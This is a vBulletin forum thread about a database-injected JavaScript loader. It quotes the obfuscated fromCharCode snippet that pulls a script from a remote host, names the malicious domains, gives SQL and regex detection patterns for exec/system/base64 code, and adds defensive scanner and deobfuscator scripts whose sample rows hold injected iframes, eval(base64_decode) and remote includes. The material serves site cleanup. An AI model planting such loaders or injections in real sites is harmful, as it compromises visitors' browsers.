A fix if your site is already exploited


  • .Josh
    replied
    What mod/plugin was doing this?



  • Mr Jolly
    replied
    I've uninstalled all the plugins I was using and removed all the files associated with them. Had a right good clear out. I have kept vBSEO though, and to be honest I think they're in the clear. I've seen another forum with this same problem and they weren't running vBSEO, so fingers crossed on that one.



  • Wayne Luke
    replied
    Originally posted by Mr Jolly
    Does this really fix it for good?
    Doubtful. Can't fix it for good without knowing the vector it was inserted in. Since it can only be found via a database search and not by looking in the footer template, the exploit points to a direct database insertion either via remote access to the database or through a plugin installed in the system. The following steps will check your code for compromises.

    1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

    2) Check the config.php for any suspicious code. It isn't checked by the suspect file diagnostic.

    3) Search all templates for iframe tags. They should only appear in the following templates: bbcode_video, editor-ie.css, member.css, stylegenerator.css, vbcms.css, vbulletin.css, help_bbcodes, humanverify_recaptcha, search_common, and search_common_select_type

    4) Check all your plugins for rogue include, require, include_once, or require_once code. All files should come from your server and be known to you.

    5) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However, some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

    6) Make sure that your plugins do not include calls to exec(), system(), or pass_thru() or iframes. These are also often signs of a hacked site.

    Query for steps 4 and 5:
    SELECT title, phpcode, hookname, product FROM plugin WHERE phpcode LIKE '%base64%' OR phpcode LIKE '%exec%' OR phpcode LIKE '%system%' OR phpcode like '%pass_thru%' OR phpcode like '%iframe%';

    7) Run this query: SELECT styleid, title, template FROM template WHERE template LIKE '%base64%' OR template LIKE '%exec%' OR template LIKE '%system%' OR template like '%pass_thru%' OR template like '%iframe%';

    It checks the templates for compromising code.

    8) Check .htaccess to make sure there are no redirects there.

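    Added example (not part of Wayne Luke's reply and not vBulletin code): a Python triage script that applies steps 3 through 8 above to rows you have exported from the template and plugin tables (for example via phpMyAdmin) and to a copy of .htaccess, so every hit can be reviewed offline before anything is changed on the live database. The iframe allowlist is the template list from step 3; the keyword patterns are the same ones the two SQL queries use, tightened to a call-like shape so that a word such as "executes" in a comment is not reported. The sample rows and .htaccess text are constructed and do not come from any real site.

```python
"""Offline triage of exported vBulletin template/plugin rows (added example)."""
import re

# Step 3: templates in which an <iframe> is expected (list taken from the post).
IFRAME_OK_TEMPLATES = {
    "bbcode_video", "editor-ie.css", "member.css", "stylegenerator.css",
    "vbcms.css", "vbulletin.css", "help_bbcodes", "humanverify_recaptcha",
    "search_common", "search_common_select_type",
}

# Steps 4-7: what the post's two SQL queries look for. LIKE '%exec%' matches any
# substring; these patterns require a call or a tag so comments are not reported.
SUSPICIOUS = {
    "base64": re.compile(r"base64_(?:en|de)code\s*\(", re.I),
    "exec": re.compile(r"\bexec\s*\(", re.I),
    "system": re.compile(r"\bsystem\s*\(", re.I),
    "passthru": re.compile(r"\bpass_?thru\s*\(", re.I),
    "iframe": re.compile(r"<\s*iframe\b", re.I),
    "fromCharCode": re.compile(r"String\.fromCharCode\s*\(", re.I),
}
# Step 4: include/require pulling code from a URL instead of a local file.
REMOTE_INCLUDE = re.compile(
    r"\b(?:include|require)(?:_once)?\s*\(?\s*['\"](?:https?|ftp)://", re.I)
# Step 8: redirect/rewrite directives in .htaccess.
HTACCESS_REDIRECT = re.compile(r"^\s*(?:Redirect(?:Match)?|RewriteRule)\b", re.I)


def scan_templates(rows):
    """rows: iterable of (styleid, title, template) as exported from the template
    table. Returns (styleid, title, pattern_name) for every suspicious match."""
    findings = []
    for styleid, title, body in rows:
        for name, pat in SUSPICIOUS.items():
            if name == "iframe" and title in IFRAME_OK_TEMPLATES:
                continue  # an iframe is legitimate in these templates (step 3)
            if pat.search(body):
                findings.append((styleid, title, name))
    return findings


def scan_plugins(rows):
    """rows: iterable of (title, phpcode, hookname, product) from the plugin table.
    Returns (product, title, hookname, pattern_name) for every suspicious match."""
    findings = []
    for title, code, hook, product in rows:
        for name, pat in SUSPICIOUS.items():
            if pat.search(code):
                findings.append((product, title, hook, name))
        if REMOTE_INCLUDE.search(code):
            findings.append((product, title, hook, "remote_include"))
    return findings


def htaccess_redirects(text):
    """Return every redirect/rewrite line in an .htaccess file for manual review.
    Legitimate rewrite rules (SEO addons, for instance) are listed too: the point
    is that each one is known to you, not that none exist."""
    return [line.strip() for line in text.splitlines() if HTACCESS_REDIRECT.match(line)]


# Constructed sample rows (template titles and contents are made up for the demo).
SAMPLE_TEMPLATES = [
    (1, "bbcode_video", '<iframe src="{vb:raw url}"></iframe>'),
    (1, "footer", "<div>{vb:raw footer}</div><script>var s=document.createElement("
                  "String.fromCharCode(115,99,114,105,112,116));</script>"),
    (2, "header", '<iframe style="display:none" src="http://example.invalid/x"></iframe>'),
    (2, "navbar", '<div class="navbar">ok</div>'),
]
SAMPLE_PLUGINS = [
    ("Forum stats", "$stats = fetch_stats(); // executes nightly", "global_start", "stats"),
    ("Unknown", "eval(base64_decode('aGVsbG8='));", "init_startup", "vbulletin"),
    ("Loader", "include_once('http://example.invalid/x.php');", "global_start", "loader"),
]
SAMPLE_HTACCESS = """# constructed sample
Options -Indexes
RewriteEngine On
RewriteRule ^(.*)$ http://example.invalid/in.cgi [R,L]
"""

if __name__ == "__main__":
    for hit in scan_templates(SAMPLE_TEMPLATES):
        print("template:", hit)
    for hit in scan_plugins(SAMPLE_PLUGINS):
        print("plugin:", hit)
    for line in htaccess_redirects(SAMPLE_HTACCESS):
        print("htaccess:", line)
```

    On the constructed rows the script reports the footer template (String.fromCharCode), the header template (an iframe outside the step 3 allowlist), the plugin calling base64_decode(), and the plugin including a file over HTTP, while the bbcode_video iframe and the "executes nightly" comment are left alone. Any hit still has to be read by a person: a branded addon's base64 block and a hidden script loader look the same to a pattern.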


  • Mr Jolly
    replied
    Does this really fix it for good?



  • Trevor Hannant
    replied
    What modifications are you running?



  • Mitchh
    started a topic [Forum] A fix if your site is already exploited

    Hey guys,

    I've seen this more than a few times and it's all the same problem. Some code gets injected into the database on the template table. Here is the code:

    Code:
    var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);
    If you decode the numbers from the second fromCharCode() you get the following URL:

    This URL loads http://directmarketingmanage.in/in.cgi?walter into a secret iframe, which some antivirus software like Avast complains about. To fix the problem, go into phpMyAdmin, go to your database, then hit search. Look for 'vBulletin_init' without the quotes in only the template table. On this page just right-click edit on every one it found and open in a new tab. Now just search on the page for vBulletin_init until you find it in the table and remove the code listed above. How this got injected into my database I have no idea... can has patch?
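    Added example (not part of Mitchh's post): a small Python decoder for the String.fromCharCode() obfuscation used in the injected snippet above. It finds every fromCharCode call in a piece of template text and turns the number list back into the string it builds, so the element name and the script URL can be read without loading the template in a browser. SNIPPET is the injected code quoted in the post; the function names are this example's own.

```python
"""Decode String.fromCharCode(...) obfuscation in injected template code (added example)."""
import re

# Matches String.fromCharCode(115,99,...) and captures the comma-separated numbers.
FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+)\)")


def decode_fromcharcode(text):
    """Return the decoded string for each String.fromCharCode(...) call, in order."""
    decoded = []
    for match in FROMCHARCODE.finditer(text):
        codes = [int(n) for n in match.group(1).split(",") if n.strip()]
        decoded.append("".join(chr(c) for c in codes))
    return decoded


def deobfuscate(text):
    """Rewrite each String.fromCharCode(...) call as a quoted literal so the
    snippet can be read as plain JavaScript. Nothing is executed."""
    return FROMCHARCODE.sub(lambda m: '"' + decode_fromcharcode(m.group(0))[0] + '"', text)


def loaded_script_urls(text):
    """Return the decoded strings that are URLs, i.e. the hosts the injected
    loader pulls a script from; these are what to compare against the
    domains and CDNs you actually use on your site."""
    return [s for s in decode_fromcharcode(text) if re.match(r"https?://", s)]


# The injected code quoted in the post.
SNIPPET = (
    "var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));"
    "script.src=String.fromCharCode(104,116,116,112,58,47,47,105,109,97,103,101,50,121,"
    "111,117,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,"
    "108,105,116,121,46,106,115);"
    "var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];"
    "head.appendChild(script);"
)

if __name__ == "__main__":
    print(deobfuscate(SNIPPET))
    for url in loaded_script_urls(SNIPPET):
        print("loads script from:", url)
```

    The three decoded pieces are the tag name ("script"), the remote script URL, and "head": the snippet appends a script element to the page head that loads JavaScript from a host that is not yours, which is why a plain substring search for the domain in the template table finds nothing and why the decoded URL, not the numbers, is the value to record and block.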